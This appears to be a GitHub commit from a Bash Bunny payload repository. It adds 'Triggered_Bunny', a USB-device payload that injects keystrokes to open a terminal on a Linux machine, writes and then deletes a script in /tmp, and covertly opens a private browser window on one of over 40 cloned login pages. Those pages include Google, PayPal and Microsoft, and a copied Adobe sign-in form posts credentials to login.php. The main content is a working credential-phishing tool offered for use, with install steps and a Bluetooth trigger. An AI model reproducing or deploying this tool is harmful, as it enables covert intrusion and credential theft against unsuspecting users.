Merge branch 'hak5:master' into add_bb_sh

pull/575/head
rsxchin 2023-01-21 10:52:45 -10:00 committed by GitHub
commit e23e35a831
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
269 changed files with 82037 additions and 6 deletions

View File

@ -56,6 +56,7 @@
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"BACKSPACE":"00,00,2a",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
@ -64,6 +65,7 @@
"[":"00,00,2f",
"]":"00,00,30",
"#":"00,00,31",
"__comment":"MIA K42 00,00,32",
";":"00,00,33",
"'":"00,00,34",
"`":"00,00,35",
@ -102,10 +104,26 @@
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"KPAD_SLASH":"00,00,54",
"KPAD_ASTERISK":"00,00,55",
"KPAD_MINUS":"00,00,56",
"KPAD_PLUS":"00,00,57",
"KPAD_ENTER":"00,00,58",
"KPAD_1":"00,00,59",
"KPAD_2":"00,00,5a",
"KPAD_3":"00,00,5b",
"KPAD_4":"00,00,5c",
"KPAD_5":"00,00,5d",
"KPAD_6":"00,00,5e",
"KPAD_7":"00,00,5f",
"KPAD_8":"00,00,60",
"KPAD_9":"00,00,61",
"KPAD_0":"00,00,62",
"KPAD_DOT":"00,00,63",
"\\":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
@ -137,6 +155,7 @@
"Z":"02,00,1d",
"!":"02,00,1e",
"\"":"02,00,1f",
"£":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"^":"02,00,23",
@ -151,19 +170,26 @@
"~":"02,00,31",
":":"02,00,33",
"@":"02,00,34",
"¬":"02,00,35",
"<":"02,00,36",
">":"02,00,37",
"?":"02,00,38",
"|":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"ALT-TAB":"04,00,2b",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
"COMMAND":"08,00,00",
"COMMAND-CTRL":"09,00,00",
"COMMAND-CTRL-SHIFT":"0b,00,00",
"COMMAND-OPTION":"0c,00,00",
"COMMAND-OPTION-SHIFT'":"0e,00,00",
"ALTGR":"40,00,00",
"ALTGR-TAB":"40,00,2b",
"¦":"40,00,35",
"CTRL-ALTGR":"41,00,00",
"ALTGR-SHIFT":"42,00,00"
}

View File

@ -0,0 +1,61 @@
## About:
* Title: Triggered_Bunny
* Description: Triggered_Bunny covertly executes phishing page on remote triggers.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Phishing/Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, ECM_ETHERNET
## Triggered_Bunny: Triggered_Bunny covertly executes phishing page on remote triggers.
### Features:
* Covert payload execution.
* Execution on remote triggers.
* 40+ phishing templates.
* Killswitch: Trigger to kill phishing instance.
* Automated browser detection.
* Informative logs.
### Installation:
```
wget https://github.com/drapl0n/bashbunny-payloads/raw/master/payloads/library/phishing/Triggered_Bunny/triggered_bunny.tar.gz
tar -xf triggered_bunny.tar.gz
cd triggered_bunny
bash install.sh
```
### Usage:
* Install [BLE TooL](https://play.google.com/store/apps/details?id=com.cozyoz.bletool&gl=US) on your phone.
* Choose Gatt Server.
* Tap three dots on top corner of the screen.
* Select "set Advertising".
* Change Device name to phishing template you want to execute.
* Change Tx Power Level accordingly.
* Start Advertising to execute payload.
* Change Device name to "killswitch" to kill phishing instance.
### List of templates:
adobe badoo deviantart discord
dropbox ebay facebook fb_advanced
fb_messenger fb_security github gitlab
google google_new google_poll ig_verify
insta_followers instagram linkedin mediafire
microsoft netflix origin paypal
pinterest playstation protonmail quora
reddit snapchat spotify stackoverflow
steam tiktok twitch twitter
vk vk_poll wordpress xbox
yahoo yandex
### LED Status:
* `INITIALIZING PAYLOAD` : YELLOW
* `READY TO RECEIVE TRIGGERS` : BLUE
* `WAITING FOR KILLSWITCH` : MAGENTA
* `PAYLOAD EXECUTION COMPLETED` : GREEN
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,18 @@
#!/bin/bash
apt update
apt install nginx php5 php5-fpm php5-cgi -y
rm /etc/nginx/nginx.conf /etc/nginx/sites-enabled/default /etc/nginx/sites-available/default
cp nginx/default /etc/nginx/sites-available/ && cp nginx/enabled-default /etc/nginx/sites-enabled/default && cp nginx/nginx.conf /etc/nginx/ && cp -rv sites/ /var/www/html/
udisk mount
read -p "Select switch to copy payload in [1|2]: " choice
if [ "$choice" = 1 ]; then
cp payload.txt /root/udisk/payloads/switch1
elif [ "$choice" = 2 ]; then
cp payload.txt /root/udisk/payloads/switch2
else
echo -e "Invalid input $choice ."
exit 1
fi
udisk umount
chown -R www-data:www-data /var/www/html/sites
echo -e "\nInstallation completed successfully."

View File

@ -0,0 +1,83 @@
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# http://wiki.nginx.org/Pitfalls
# http://wiki.nginx.org/QuickStart
# http://wiki.nginx.org/Configuration
#
# Generally, you will want to move this file somewhere, and start with a clean
# file but keep this around for reference. Or just disable in sites-enabled.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##
# Default server configuration
#
server {
listen 80 default_server;
listen [::]:80 default_server;
# SSL configuration
#
# listen 443 ssl default_server;
# listen [::]:443 ssl default_server;
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
# include snippets/snakeoil.conf;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
fastcgi_split_path_info ^(.+\.php)(/.+)$;
include snippets/fastcgi-php.conf;
# # With php5-cgi alone:
# #fastcgi_pass 127.0.0.1:9000;
# With php5-fpm:
fastcgi_pass unix:/var/run/php5-fpm.sock;
# fastcgi_index index.php;
include fastcgi_params;
}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}
# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
# listen 80;
# listen [::]:80;
#
# server_name example.com;
#
# root /var/www/example.com;
# index index.html;
#
# location / {
# try_files $uri $uri/ =404;
# }
#}

View File

@ -0,0 +1,83 @@
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# http://wiki.nginx.org/Pitfalls
# http://wiki.nginx.org/QuickStart
# http://wiki.nginx.org/Configuration
#
# Generally, you will want to move this file somewhere, and start with a clean
# file but keep this around for reference. Or just disable in sites-enabled.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##
# Default server configuration
#
server {
listen 80 default_server;
listen [::]:80 default_server;
# SSL configuration
#
# listen 443 ssl default_server;
# listen [::]:443 ssl default_server;
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
# include snippets/snakeoil.conf;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
fastcgi_split_path_info ^(.+\.php)(/.+)$;
include snippets/fastcgi-php.conf;
# # With php5-cgi alone:
# #fastcgi_pass 127.0.0.1:9000;
# With php5-fpm:
fastcgi_pass unix:/var/run/php5-fpm.sock;
# fastcgi_index index.php;
include fastcgi_params;
}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}
# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
# listen 80;
# listen [::]:80;
#
# server_name example.com;
#
# root /var/www/example.com;
# index index.html;
#
# location / {
# try_files $uri $uri/ =404;
# }
#}

View File

@ -0,0 +1,85 @@
user www-data;
worker_processes 4;
pid /run/nginx.pid;
events {
worker_connections 768;
# multi_accept on;
}
http {
##
# Basic Settings
##
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;
# server_names_hash_bucket_size 64;
# server_name_in_redirect off;
include /etc/nginx/mime.types;
default_type application/octet-stream;
##
# SSL Settings
##
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
##
# Gzip Settings
##
gzip on;
gzip_disable "msie6";
# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}

View File

@ -0,0 +1,329 @@
#!/bin/bash
# Description: Triggered_Bunny covertly executes phishing page on remote triggers.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Phishing/Credentials
# Target: Unix-like operating systems.
# Attackmodes: HID, ECM_ETHERNET
ATTACKMODE ECM_ETHERNET HID
Q DELAY 1000
function browser() {
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
Q STRING echo -e "\"#\!/bin/bash\nfunction browser(){\n\tbrowser=\\\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \\\"\\\$browser\\\" = firefox ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --private-window)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = chromium ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = brave ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \\\"Browser not found.\\\"\n\tfi\n}\nbrowser "\" \> /tmp/coco.sh
Q ENTER
Q DELAY 300
}
function exec_rm(){
Q ENTER
Q DELAY 500
Q STRING bash /tmp/coco.sh \&\& rm /tmp/coco.sh \&\& exit
Q ENTER
Q DELAY 500
Q F11
}
function killl(){
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
while true; do
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
if grep -ao $1 /tmp/bt_observation; then
Q CTRL w
break
fi
done
}
function templates() {
while true; do
case "$template" in
adobe)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/adobe/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
badoo)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/badoo/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
deviantart)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/deviantart/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
discord)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/discord/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
dropbox)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/dropbox/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
ebay)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/ebay/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
facebook)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/facebook/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
fb_advanced)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/fb_advanced/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
fb_messenger)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/fb_messenger/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
fb_security)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/fb_security/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
github)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/github/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
gitlab)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/gitlab/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
google)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/google/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
google_new)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/google_new/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
google_poll)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/google_poll/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
ig_verify)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/ig_verify/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
insta_followers)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/insta_followers/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
instagram)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/instagram/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
linkedin)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/linkedin/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
mediafire)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/mediafire/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
microsoft)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/microsoft/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
netflix)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/netflix/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
origin)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/origin/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
paypal)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/paypal/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
pinterest)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/pinterest/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
playstation)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/playstation/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
protonmail)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/protonmail/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
quora)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/quora/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
reddit)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/reddit/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
snapchat)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/snapchat/signin.php \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
spotify)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/spotify/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
stackoverflow)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/stackoverflow/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
steam)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/steam/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
tiktok)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/tiktok/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
twitch)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/twitch/user.php \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
twitter)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/twitter/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
vk)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/vk/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
vk_poll)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/vk_poll/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
wordpress)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/wordpress/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
xbox)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/xbox/index.php \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
yahoo)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/yahoo/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
yandex)
browser
Q STRING echo ""\"\\\$execBrowser http://172.16.64.1/sites/yandex/login.html \&\" \>\> /tmp/coco.sh
exec_rm
break
;;
*)
echo $template not found
;;
esac
done
}
LED Y
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
service nginx start
sleep 1
echo -n -e "AT+ROLE=2" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
while true; do
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
template=$(grep -owaE 'adobe|badoo|deviantart|discord|dropbox|ebay|facebook|fb_advanced|fb_messenger|fb_security|github|gitlab|google|google_new|google_poll|ig_verify|insta_followers|instagram|linkedin|mediafire|microsoft|netflix|origin|paypal|pinterest|playstation|protonmail|quora|reddit|snapchat|spotify|stackoverflow|steam|tiktok|twitch|twitter|vk|vk_poll|wordpress|xbox|yahoo|yandex' /tmp/bt_observation)
echo $template
case "$template" in
adobe|badoo|deviantart|discord|dropbox|ebay|facebook|fb_advanced|fb_messenger|fb_security|github|gitlab|google|google_new|google_poll|ig_verify|insta_followers|instagram|linkedin|mediafire|microsoft|netflix|origin|paypal|pinterest|playstation|protonmail|quora|reddit|snapchat|spotify|stackoverflow|steam|tiktok|twitch|twitter|vk|vk_poll|wordpress|xbox|yahoo|yandex)
echo $template found
break
;;
*)
echo $template not found
;;
esac
done
LED B
templates
LED M
killl killswitch
LED G

View File

@ -0,0 +1,535 @@
<!DOCTYPE html>
<!--[if IE 8]> <html data-placeholder-focus="false" class="ie ie8 lt-ie9 has-dob-explanation en us" data-pagename="login" lang="en"> <![endif]-->
<!--[if IE 9]> <html data-placeholder-focus="false" class="ie ie9 has-dob-explanation en us" data-pagename="login" lang="en"> <![endif]-->
<!--[if gt IE 9]><!-->
<html data-placeholder-focus="false" class="has-dob-explanation en us history svg cssanimations wf-adobeclean-n4-active wf-adobeclean-n7-active wf-adobeclean-n3-active wf-active wf-inactive" data-pagename="login" lang="en"><!--<![endif]--><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
<meta name="mswebdialog-newwindowurl" content="*">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="https://use.typekit.net/ecr2zvs.js" async=""></script><script>
window.marketingtech = {
adobe: {
launch: {
environment: 'production'
}
}
};
</script>
<script src="https://wwwimages2.adobe.com/etc/beagle/public/globalnav/adobe-privacy/latest/privacy.min.js"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/evidon-sitenotice-tag.js" async="" id="evidon-notice"></script><script type="text/javascript" src="//c.evidon.com/geo/country.js" async="" id="evidon-location"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/414/snthemes.js" async="" id="evidon-themes"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/414/adobe/settings.js" async="" id="evidon-settings"></script>
<script src="https://www.adobe.com/marketingtech/main.min.js"></script>
<style>
div.evidon-banner {display: none !important;}
</style>
<script>
window.launchConfig = {
analyticsAccount: 'adbadobenonacdcprod,adbims',
appCodeValue: JSON.parse('{\"ac\":\"IMS\",\"av\":\"1.50.7-42\",\"di\":null,\"mc\":null,\"pl\":null}'),
clientId: 'SunbreakWebUI1',
locale: 'en_US',
pageName: 'onLoad_SignInForm',
touaName: ''
}
</script>
<script>
(function(d) {
'use strict';
var h = d.documentElement;
// Default: Latin Extended
var defaultKit = 'znu8cfp';
var language = h.getAttribute('lang') || 'ro';
var kitLanguages = {
// Latin
'ecr2zvs': [ 'da', 'de', 'en', 'es', 'it', 'nb', 'pt', 'sv' ],
// Latin-extended
'znu8cfp': [ 'bg', 'cs', 'et', 'fi', 'fr', 'hr', 'hu', 'lt', 'lv', 'nl', 'pl', 'ro', 'ru', 'sk', 'sl', 'sr', 'tr', 'uk' ],
// Chinese: traditional & simplified
'hlx1mlm': ['zh'],
// Japanese
'bzy1cfu': ['ja'],
// Korean
'tra0jgq': ['ko']
};
var getLanguageKit = function(language) {
for (var kit in kitLanguages) {
if (kitLanguages.hasOwnProperty(kit)) {
for (var lang in kitLanguages[kit]) {
if (kitLanguages[kit][lang] === language) {
return kit;
}
}
}
}
return defaultKit;
};
var triggerEvent = function (eventName) {
var event = document.createEvent('Event');
event.initEvent(eventName, true, true);
document.dispatchEvent(event);
}
var config = {
// Events
active: function () {
triggerEvent('TypekitActive');
},
inactive: function () {
triggerEvent('TypekitInactive');
},
// Settings
async: true,
kitId: getLanguageKit(language),
scriptTimeout: 3000
};
var hideSpinner = function() {
window.clearTimeout(t);
var html = document.documentElement;
html.className = html.className.replace(/\bwf-loading\b/g, '')+' wf-inactive';
};
var t = setTimeout(hideSpinner, config.scriptTimeout);
var loadTypekit = function() {
var s = d.getElementsByTagName('script')[0];
var html = document.documentElement;
var tk = d.createElement('script');
html.className += ' wf-loading';
tk.src = 'https://use.typekit.net/'+config.kitId+'.js';
tk.async = true;
tk.onload = tk.onreadystatechange= initTypeKit;
tk.onerror = hideSpinner;
s.parentNode.insertBefore(tk,s);
};
var typekitInitialized = false;
var initTypeKit = function() {
var a = this.readyState;
if(typekitInitialized||a&&a!='complete'&&a!='loaded')return;
typekitInitialized = true;
try{Typekit.load(config);}catch(e){}
};
if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", loadTypekit, false);
} else if (document.attachEvent) {
document.attachEvent("onreadystatechange", function() {
if (document.readyState === "complete" ) {
loadTypekit();
}
});
}
})(document);
</script>
<meta name="viewport" content="initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<title>Sign in - Adobe ID</title>
<link rel="stylesheet" type="text/css" href="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/css/head.css">
<script>var special_day_char = "";</script>
<!--[if lte IE 8]>
<script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/ie8.js"></script>
<![endif]-->
<script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_head.js"></script><style type="text/css">.tk-adobe-clean{font-family:"adobe-clean",sans-serif;}</style><style type="text/css">@font-face{font-family:tk-adobe-clean-n4;src:url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:tk-adobe-clean-n7;src:url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3) format("woff2"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3) format("woff"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?subset_id=2&fvd=n7&v=3) format("opentype");font-weight:700;font-style:normal;}@font-face{font-family:tk-adobe-clean-n3;src:url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}</style><style type="text/css">@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3) format("woff2"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3) format("woff"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?subset_id=2&fvd=n7&v=3) format("opentype");font-weight:700;font-style:normal;}@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}</style>
</head>
<body ontouchstart="" id="adobesusi" class="capslock-unknown">
<div id="spinner_overlay" class="overlay">
<div id="squarespinner_template" class="overlay-spinner"></div>
</div>
<div class="container " role="main" id="">
<div class="page-header">
<div id="idp-flow-header" class="idp-flow-logo">
<div class="idp-flow-logo-image"></div>
<span id="idp-flow-individual-text" class="idp-flow-logo-text"></span>
</div>
</div>
<div id="adobeid_view" class="view">
<div class="row mod-title-row">
<h1 class="page-action">
For your protection, please verify your identity.</h1>
</div>
<div id="indicatorPanel" class="indicatorPanel mod-hidden">
<p class="row mod-top-spaced mod-bot-spaced"><strong id="indicatorPanel-Email"></strong></p>
<p class="row mod-top-spaced mod-bot-spaced">We are taking you to sign in with Facebook.</p>
<div class="inline-spinner">
<div class="inline-spinner-element"></div>
<div class="inline-spinner-element mod-second"></div>
<div class="inline-spinner-element mod-third"></div>
</div>
<div class="row mod-top-spaced mod-bot-spaced">
<button id="indicatorPanel-ContinueButton" class="indicatorPanel-ContinueButton button" type="button"><span class="icon icon-facebook"></span> <span>Continue to Facebook</span></button>
</div>
</div>
<form id="adobeid_signin" class="loginform" method="post" action="login.php" data-component="spinner" novalidate="novalidate">
<input id="adobeid_callback" name="callback" value="https://ims-na1.adobelogin.com/ims/adobeid/SunbreakWebUI1/AdobeID/token?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;scope=AdobeID%2Copenid%2Csunbreak%2Cacct_mgmt_webui%2Cgnav%2Cadditional_info.account_type%2Csao.cce_private%2Ccreative_cloud%2Cread_countries_regions%2Cupdate_profile.password%2Cadditional_info.roles%2Cupdate_profile.optionalAgreements%2Cupdate_profile.change_password%2Cadditional_info.social%2Csocial.link%2Cunlink_social_account%2Cadmin_slo%2Creauthenticated" type="hidden">
<input id="adobeid_client_id" name="client_id" value="SunbreakWebUI1" type="hidden">
<input id="adobeid_denied_callback" name="denied_callback" value="https://ims-na1.adobelogin.com/ims/denied/SunbreakWebUI1?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;response_type=token" type="hidden">
<input id="adobeid_display" name="display" value="web_v2" type="hidden">
<input id="adobeid_flow" name="flow" value="true" type="hidden">
<input id="adobeid_flow_type" name="flow_type" value="token" type="hidden">
<input id="adobeid_idp_flow_type" name="idp_flow_type" value="login" type="hidden">
<input id="adobeid_locale" name="locale" value="en_US" type="hidden">
<input id="adobeid_page_name" name="page_name" value="onLoad_SignInForm" type="hidden">
<input id="adobeid_reauthenticate" name="reauthenticate" value="force" type="hidden">
<input id="adobeid_relay" name="relay" value="ddf39b99-b9ba-4e0c-af20-f0aa6bd69144" type="hidden">
